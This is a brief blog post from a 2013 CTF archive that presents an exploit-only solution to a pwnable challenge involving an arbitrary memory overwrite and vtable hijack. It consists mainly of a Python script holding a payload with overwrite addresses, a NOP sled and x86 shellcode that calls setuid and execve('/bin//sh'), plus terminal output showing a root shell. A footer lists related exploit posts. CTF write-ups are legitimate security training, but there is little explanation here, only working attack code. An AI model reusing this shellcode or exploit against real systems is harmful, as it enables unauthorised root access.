Category : Pwnables
|
8ff953dd97c4405234a04291dee39e0bSummary : arbitrary memory overwrite, vtable
Exploit
#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4\n" payload += "\xe4\x91\x04\x08" payload += "\xe8\x91\x04\x08" payload += "\x90"*0x30 payload += shellcode |
root@ubuntu:~/vuln/300# (./exploit.py;cat) | ./8ff953dd97c4405234a04291dee39e0b Input Num : Input Msg : id uid=0(root) gid=0(root) groups=0(root) |
'CTF > 2013' 카테고리의 다른 글
| Plaid CTF 2013 - pork (Exploit only) (0) | 2013.04.22 |
|---|---|
| Codegate 2013 Qual - Vulnerab 500 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual - Vulnerab 400 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual - Vulnerab 200 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual Pwnable Chal Exploits (0) | 2013.04.17 |
